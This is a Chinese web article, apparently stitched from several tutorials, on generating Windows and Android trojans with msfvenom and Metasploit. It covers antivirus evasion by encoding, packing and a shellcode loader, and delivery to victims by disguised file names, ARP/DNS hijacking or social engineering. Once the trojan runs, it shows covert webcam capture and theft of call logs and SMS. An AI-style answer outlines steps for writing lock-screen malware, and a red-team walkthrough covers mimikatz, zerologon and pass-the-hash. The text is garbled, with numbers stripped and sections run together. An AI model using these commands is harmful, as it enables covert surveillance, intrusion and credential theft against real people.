2024年10月msf生成安卓木马免杀(msfvenom的简单使用)

 更新时间:2024-10-12

  ⑴msf生成安卓木马免杀(msfvenom的简单使用

  ⑵msfvenom的简单使用

  ⑶下面简单的演示一下msfvenom的简单使用,攻击者:kaliLinux?ip:...靶机:Windows?思路:利用msfvenom制作.exe文件,然后发送到靶机Windows上面,运行后就可以在kalilinux上面利用msfconsole连接msfvenom服务控制靶机.在kaliLinux上面启动一个终端执行以下命令列出所有可以用的并在屏幕显示条目中有Windows?xtcp的payload在这里我们选择windows/x/meterpreter/reverse_tcp下面是使用msfvenom的部分参数,是比较常用的-p选择一个payload-l载荷列表-f生成的文件格式-e编码方式-i编码次数-b在生成的程序中避免出现的值-x允许我们指定一个自定义的可执行文件作为模板,也就是将木马捆绑到这个可执行文件上。-h帮助在这里,我们生成一个test.exe的木马文件(文件在root文件夹下,控制端的ip为...,端口号为。然后利用这个木马传给靶机,可以改一改名字,比如QQ坦白说查看器之类的,杀毒软件可能报毒,其实是需要免杀处理的,后面学了再说吧。.利用msfconsole监听启动msfconsole?漫长的等待..................................................然后报错了,然后查了一下,分配的内存不够解决地址这样解决有点慢,我有一个更暴力的,既然内存不足,我就把虚拟机分配给kaliLinux的内存加到G,OK问题解决键入以下命令:然后就可以等待了,当靶机点击了那个文件时就可以开始你的表演了,比如截图,打开摄像头等等

  ⑷免杀工具shellcodeloader

  ⑸工具地址:shellcodeloader不想自己编译,就用工具作者自己编译的成品,realseMSF生成bin文件:msfvenom-pwindows/x/meterpreter_reverse_tcpLHOST=IPLPORT=port-fraw-o.bin将生成好的木马.bin拖入shellcodeloader中,并勾选所需配置,配置的选择原项目中介绍的很清楚,这里就不过多赘述了,点击Generate就会生成loader.exe:绕过静态查杀:运行木马,绕过动态查杀:MSF正常接收shell:大佬随手给个赞呗.

  ⑹使用msf渗透安卓系统

  ⑺渗透机:kali.靶机:安卓手机一部首先我们需要生成一个安卓木马至于木马的免杀暂且不谈。然后打开msfconsole然后执行获取一个安卓手机的session,我们可以获取当前通话记录,聊天短信等信息下面是我从网上找的一些参数的释义。剩下的就自个慢慢玩吧,我就先撤了。。。。。。。

  ⑻如何用msfvenom生成木马程序

  ⑼一,目的:熟悉msfvenom生成木马程序过程,并执行和监听控制.二,工具:MSF三,原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线四,过程:,查看帮助命令:root#msfvenom-h结果:,生成meterpreterpayload并利用shikata_ga_nai编码,查看所需选项,利用-o参数命令:root#msfvenom-pwindows/meterpreter/reverse_tcp-o结果:,现在设置LHOST,即监听主机IP和LPORT监听端口,我是本地局域网测试,所以IP是...,端口设置成.所以最后连接会通向...的端口命令:root#msfvenom-pwindows/meterpreter/reverse_tcp-ex/shikata_ga_nai-i-b‘x’LHOST=...LPORT=-fexe》abc.exe注:如果只是用msfpayload生成,简单示例:命令:root#msfpayloadwindows/meterpreter/reverse_tcpLHOST=...X》Desktop/abc.exe多次生成可进行免杀:msfpayloadwindows/shell_reverse_tcplhost=...lport=r|msfencode-ex/shikata_ga_nai-c-traw|msfencode-ex/alpha_upper-c-traw|msfencode-ex/shikata_ga_nai-c-traw|msfencode-ex/alpha_upper-c-texe-o/root/Desktop/a.exeupx加壳:upx-/root/Desktop/a.exe结果:说明:-ppayload-e编码方式-i编码次数-b在生成的程序中避免出现的值LHOST,LPORT监听上线的主机IP和端口-fexe生成EXE格式,把生成的abc.exe放到win下.执行.,在命令行下,打开msfconsole.命令:root#msfconsole,本机监听,因为之前用的是reverse_tcp,所以设置如下命令:msf》useexploit/multi/handlerMsfexploit(handler)》setpayloadwindows/meterpreter/reverset_tcp结果:,现在快完成了,设置LHOST,LPORT,并执行exploit,会发现有连接进来.,.验证

  ⑽msf怎么远程监控安卓手机

  ⑾既然是入侵安卓手机,肯定要先配置一个安卓木马,那我们看看本机的IP

  ⑿在到终端输入命令:msfvenom-pandroid/meterpreter/reverse_tcpLHOST=...LPORT=R》/root/apk.apk

  ⒀以前的MSF老版本是用msfpayload生成木马现在在新版本中都用msfvenom代替了,所以有些朋友在终端输入msfpayload的时候会提示

  ⒁msfpayload无法找到命令所以使用msfvenom即可,这里LHOST对应的是本机的IP地址LPORT对应你要监听的端口然后生成木马的路径

  ⒂这样我们就在/root/路径下生成了一个APK的安卓木马文件,至于木马的免杀暂且不谈。现在我们在来启动MSF工具

  ⒃输入命令:msfconsole

  ⒄useexploit/multi/handler加载模块

  ⒅?setpayloadandroid/meterpreter/reverse_tcp?选择Payload

  ⒆showoptions查看参数设置

  ⒇我们看见payload里边有两个参数要设置LHOST和LPORT表示地址和端口默认的端口是现在我们来更改设置

  ⒈setLHOST...这里的地址设置成我们刚才生成木马的IP地址

  ⒉setLPORT这里的端口设置成刚才我们生成木马所监听的端口

  ⒊exploit开始执行漏洞开始监听...

  ⒋OK,一切准备工作准备就绪。。。现在要做的就是把木马文件搞到人家的手机上,思路有很多可以DNSarp劫持欺骗只要对方用手机下载文件就会下载我们的木马文件

  ⒌还有社工什么等等的,这里我就简单的把木马文件弄我自己的手机上做测试

  ⒍安装完成后会在桌面上生成一个MainActivity的程序图标这个就是我们刚才生成的木马当我们点击了这个图标手机会没有任何反应其实木马已经开始运行起来了

  ⒎我们可以在我们的MSF里看见有一个会话连接了

  ⒏这样对方的手机就就被我们控制了,查看手机系统信息,输入命令sysinfo

  ⒐webcam_list查看手机摄影头有几个这里显示两项分别表示有前后两个摄像头

  ⒑webcam_snap隐秘拍照功能

  ⒒后边跟上参数-i指定使用那个摄像头拍照

  ⒓可以看见我们分别对前后摄像头都拍了照保存到了桌面上

  ⒔还可以输入命令?webcam_stream开启摄像头

  ⒕您好,制作锁机病毒需要一定的知识和技术,下面是一些步骤:.首先,您需要了解病毒的基本知识,包括它的工作原理,它的传播方式,以及它的攻击目标。.然后,您需要学习一些编程语言,如C++,Python,Java等,以便编写病毒代码。.接下来,您需要学习一些病毒分析和反病毒技术,以便编写更有效的病毒代码。.然后,您需要使用一些病毒分析工具,如PEID,OllyDbg等,以便检查病毒的功能和效果。.最后,您可以使用一些反病毒软件,如McAfee,Kaspersky等,来测试病毒的安全性和有效性。以上就是制作锁机病毒的基本步骤,希望能够帮助您。

  ⒖如何利用msfcode来进行加密免杀

  ⒗安全攻防实战系列MSF

  ⒘前言在红队攻防中,我们主要在外网进行信息收集,通过cms或者其他漏洞拿到shell,之后通过免杀木马将windows或linux服务器上线到cobaltstrike或msf等c服务器,之后对内网进行信息收集并绘制网络拓扑图,进行工作组或域渗透,拿到各个网段机器的权限,远程登陆并截图证明。环境配置从虚拟机网络来看机器描述目录如下蚁剑拿shellmsf免杀拿shell使用msfvenom生成免杀木马payload,里面的IP和端口自行修改,就是反弹shell的kali使用分离免杀工具生成loader.exe文件对生成的exe文件进行加壳免杀免杀效果如下免杀之后通过蚁剑上传到server-bt上msf开启监听蚁剑运行getuidpsmsf内网渗透loadmimikatz#加载Mimikatz模块成功开启了远程桌面,并且生成了一个txt文件,这个txt文件往后可用来关闭远程桌面,关闭命令runmulti_console_mand-r/root/.msf/loot/xx_default_..._host.windows.cle_xxx.txt绕过火绒添加用户蚂蚁剑或者cs上传添加用户.exe远程登录server-bt然后再添加一个由system权限下开启的桌面进程Earthworm穿透上传EW(Earthworm到C:/wwwroot/kali环境进行爆破proxychainshydra-P/usr/xxx/password.lst...redis利用过程代理蚁剑进行连接这个shell并查看权限Earthworm穿透挂代理,通过之前上传的EW(Earthworm服务器端执行以下命令(关掉server-bt的防火墙代理才能生效)executeC:wwwrootew.exe-sssocksd-l用msfvenom生成一个正向马传进去(因为无法访问外网,反向出不来,msf正向连接。使用分离免杀工具生成loader.exe文件免杀效果如下C:ProgramDataxxxx.exe-i-c“certutil-urlcache-split-fps添加账户和远程连接同第一层loadmimikatz#加载Mimikatz模块这里已经满足触发zerologon的两个条件,能ping通域控制器,知道域控计算机名,当然最后dump出域内所有hash的时候需要域名置空域控机器用户NTLMhashproxychainspythoncve---exploit.pyserver-dc$...接下来用置空的机器账户dump所有hash(c这个hash就是“空“的NTMLhash我们的目标是获得域内administrator的hash,然后就可以hash传递,登陆任意域内机器利用psexec(PTH)上线server-dc到MSF:成功获取到shell利用psexec上线server-ex到MSF:

您可能感兴趣的文章:

相关文章